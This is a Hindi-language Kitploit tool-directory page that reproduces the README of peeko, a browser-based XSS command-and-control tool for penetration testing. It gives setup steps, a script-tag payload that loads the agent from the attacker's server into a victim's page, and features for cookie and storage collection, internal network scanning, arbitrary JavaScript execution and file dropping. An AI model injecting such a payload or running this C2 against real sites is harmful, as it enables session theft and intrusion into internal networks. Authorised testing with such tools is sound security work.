Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
peeko — peeko – ब्राउज़र-आधारित XSS C2, संक्रमित ब्राउज़र के माध्यम से गुप्त आंतरिक नेटवर्क अन्वेषण के लिए। | Kitploit
उपकरण/GitHubGitHub/b3rito/peeko
टोहीनेटवर्क मैपिंगपोर्ट स्कैनिंगपार्श्व आंदोलनवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करनापोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubb3rito/peeko
23028161 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

peeko

peeko – ब्राउज़र-आधारित XSS C2, संक्रमित ब्राउज़र के माध्यम से गुप्त आंतरिक नेटवर्क अन्वेषण के लिए।

रिपॉजिटरी देखें

peeko

संस्करण: v1.1

peeko एक ब्राउज़र-आधारित XSS-संचालित C2 (कमांड एंड कंट्रोल) उपकरण है जो पीड़ित के ब्राउज़र को आंतरिक नेटवर्क के अंदर एक छिपे हुए प्रॉक्सी के रूप में उपयोग करता है।

इंजेक्ट किए गए XSS पेलोड के माध्यम से, peeko एक केंद्रीय सर्वर से WebSocket कनेक्शन स्थापित करता है, जिससे हमलावर पीड़ित के ब्राउज़र को दूरस्थ रूप से नियंत्रित करके आंतरिक सेवाओं को अनुरोध भेज सकता है, नेटवर्क स्कैन कर सकता है, डेटा एक्सफ़िल्ट्रेट कर सकता है, या यहाँ तक कि मनमाना JavaScript निष्पादित कर सकता है — यह सब बिना एक भी बाइनरी ड्रॉप किए।


विशेषताएँ

  • हमलावर और पीड़ित के बीच WebSocket-आधारित संचार
  • पीड़ित का ब्राउज़र आंतरिक URL प्राप्त करता है और IP रेंज + पोर्ट स्कैन करता है
  • सरल नियंत्रण पैनल जिसमें शामिल है:
    • पीड़ित चयनकर्ता
    • मैनुअल URL प्राप्ति
    • IP और पोर्ट रेंज स्कैनर
    • कस्टम JS निष्पादन (मैनुअल या स्वचालित)
    • फ़ाइल वितरण (स्वचालित/मैनुअल)
    • ब्राउज़र जानकारी और टोकन संग्रह (कुकीज़, स्टोरेज, आदि)
    • लॉग व्यूअर, .txt या .json के रूप में कॉपी/सेव करने की सुविधा
  • सेल्फ-साइन्ड प्रमाणपत्रों के साथ HTTPS समर्थन
  • हल्का: एक Python फ़ाइल + स्थैतिक संपत्तियाँ

आवश्यकताएँ

  • Python 3.8+
  • OpenSSL
  • Linux/macOS (डेबियन-आधारित सिस्टम पर परीक्षण किया गया)

त्वरित प्रारंभ

  1. रिपॉजिटरी क्लोन करें:

    git clone https://github.com/b3rito/peeko.git
    cd peeko
    
  2. निर्भरताएँ स्थापित करें:

    make install
    
  3. (वैकल्पिक) स्क्रिप्ट को निष्पादन योग्य बनाएं:

    chmod +x gen-cert.sh start.sh
    
  4. सेल्फ-साइन्ड TLS प्रमाणपत्र जनरेट करें:

    make cert
    
  5. SERVER-IP प्लेसहोल्डर बदलें:

    निम्नलिखित फ़ाइलों को खोलें और संपादित करें:

    • static/agent.js
    • static/control.html

    SERVER-IP को अपने सर्वर के IP/डोमेन से बदलें:

    wss://SERVER-IP:8443/ws → wss://192.168.30.136:8443/ws
    
  6. सर्वर प्रारंभ करें:

    make run
    
  7. अपने ब्राउज़र में नियंत्रण पैनल खोलें:

    https://192.168.30.136:8443/static/control.html
    
  8. एजेंट इंजेक्ट करें (उदाहरण XSS):

    <script src="https://192.168.30.136:8443/static/agent.js"></script>
    

नियंत्रण पैनल की विशेषताएँ

मुख्य कार्य

  • कनेक्टेड पीड़ितों को चुनें और प्रबंधित करें
  • पीड़ित के माध्यम से किसी भी आंतरिक/बाहरी HTTPS URL को प्राप्त करें
  • लैन रेंज स्कैन करें: 192.168.1.0/24, 10.0.0.10-20, आदि।
  • विशिष्ट पोर्ट या रेंज स्कैन करें (जैसे, 80, 443,8000-8080)

फ़ाइल वितरण

  • पीड़ित को फ़ाइलें भेजें (WebSocket के माध्यम से Base64)
  • पीड़ित का ब्राउज़र उन्हें स्वचालित रूप से डाउनलोड करता है
  • कनेक्ट होने पर स्वचालित अपलोड का समर्थन करता है

जानकारी एकत्र करना

  • User Agent, प्लेटफ़ॉर्म, रेफरर, कुकीज़, local/sessionStorage एकत्र करें
  • परिणाम JSON में देखें
  • मैन्युअल रूप से ट्रिगर या कनेक्ट होने पर स्वतः एकत्र करें

कस्टम JS निष्पादन

  • पीड़ित के ब्राउज़र पर मनमाना JavaScript चलाएँ
  • भेजने के लिए exec:... प्रारूप का उपयोग करें
  • कनेक्ट होने पर ऑटो-रन का समर्थन करता है
  • उदाहरण: exec:alert(document.cookie);

लॉगिंग

  • सब कुछ लॉग किया जाता है (अनुरोध, प्रतिक्रियाएँ, जानकारी डंप)
  • लॉग को .txt या .json के रूप में कॉपी या एक्सपोर्ट करें
  • टर्मिनल लॉग की तरह डिज़ाइन किया गया न्यूनतम UI

CORS और मिश्रित सामग्री की व्याख्या

आधुनिक ब्राउज़र नीतियाँ प्रभावित करती हैं कि peeko क्या एक्सेस कर सकता है।

CORS प्रतिक्रियाएँ

हेडरक्या सामग्री पढ़ सकते हैं?टिप्पणियाँ
Access-Control-Allow-Origin: *✅प्रतिक्रिया तक पूर्ण पहुँच
कोई हेडर नहीं⚠️प्रतिक्रिया अस्पष्ट है
प्रतिबंधित ओरिजिन❌अवरुद्ध या अपठनीय

मिश्रित सामग्री

पीड़ित HTTPS के माध्यम से कनेक्ट होता है। यदि स्कैन किया गया लक्ष्य केवल HTTP का उपयोग करता है:

  • ब्राउज़र मिश्रित सामग्री अनुरोधों को ब्लॉक करेगा
  • peeko http:// एंडपॉइंट से नहीं पढ़ सकता
  • स्कैन करते समय हमेशा HTTPS का उपयोग करने वाले लक्ष्यों को प्राथमिकता दें

व्यवहार में

पैनेट्रेशन टेस्ट के दौरान, यदि आपको कोई आंतरिक सेवा मिलती है जो Access-Control-Allow-Origin: * के साथ प्रतिक्रिया करती है और HTTPS पर सर्व होती है, तो peeko एक स्टील्थ प्रॉक्सी बन जाता है जो बिना कोई फ़ाइल ड्रॉप किए या आउटबाउंड कनेक्शन खोले, पीड़ित के ब्राउज़र से सीधे आंतरिक डेटा एक्सफ़िल्ट्रेट करने में सक्षम है।


प्रोजेक्ट संरचना

peeko/
├── main.py             → FastAPI WebSocket server  
├── start.sh            → Launch server  
├── gen-cert.sh         → Generate self-signed TLS certificate  
├── Makefile            → Install/run helpers  
├── requirements.txt    → Python dependencies  
├── certs/              → TLS key and cert will be stored here  
└── static/             → Browser client assets  
    ├── control.html    → Control panel (was attacker.html)  
    ├── infect.html     → Victim landing page  
    └── agent.js        → Victim agent script  

कार्यप्रवाह

  1. हमलावर XSS इंजेक्ट करता है (स्टोर या रिफ्लेक्टेड भेद्यता के माध्यम से)
  2. पीड़ित का ब्राउज़र WebSocket के माध्यम से peeko सर्वर से कनेक्ट होता है
  3. नियंत्रण पैनल हमलावर को अनुमति देता है:
    • नेटवर्क स्कैन करें
    • URL प्राप्त करें
    • कुकीज़, स्टोरेज डंप करें
    • मनमाना JS चलाएँ
    • प्रतिक्रियाएँ एक्सफ़िल्ट्रेट करें
    • फ़ाइलें ड्रॉप करें

उपयोग के मामले

  • XSS के माध्यम से आंतरिक नेटवर्क मैपिंग
  • ब्राउज़र-आधारित पिवोटिंग
  • साइलेंट फ़ाइल डिलीवरी / JS ड्रॉपर

अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
जिन वातावरणों में आपके पास स्पष्ट अनुमति है, उनके बाहर peeko का कोई भी उपयोग सख्त रूप से निषिद्ध है।
आप अपने कार्यों के लिए स्वयं ज़िम्मेदार हैं।


लेखक

द्वारा लिखित: b3rito, mes3hacklab पर और GioPpeTto

टूल डाउनलोड करें